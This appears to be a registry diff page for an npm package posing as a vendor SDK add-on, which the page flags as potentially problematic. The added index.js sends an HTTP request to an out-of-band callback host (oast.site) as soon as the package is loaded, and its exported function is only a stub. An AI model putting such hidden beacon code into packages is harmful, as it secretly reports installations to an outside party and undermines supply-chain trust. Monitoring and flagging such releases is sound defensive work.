@vertiv-co/voidray-sdk-addon-disk-image-browse 1.15.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @vertiv-co/voidray-sdk-addon-disk-image-browse might be problematic. Click here for more details.
- package/index.js +16 -0
- package/package.json +11 -0
package/index.js
ADDED
@@ -0,0 +1,16 @@
|
|
1
|
+
const axios = require('axios');
|
2
|
+
|
3
|
+
async function sendRequest() {
|
4
|
+
try {
|
5
|
+
const response = await axios.get('https://cqg77kled631sm393c0gxr9tggs83149n.oast.site/');
|
6
|
+
} catch (error) {
|
7
|
+
console.error('Error sending request:', error);
|
8
|
+
}
|
9
|
+
}
|
10
|
+
|
11
|
+
// Call the function
|
12
|
+
sendRequest();
|
13
|
+
|
14
|
+
module.exports = function() {
|
15
|
+
console.log("test");
|
16
|
+
};
|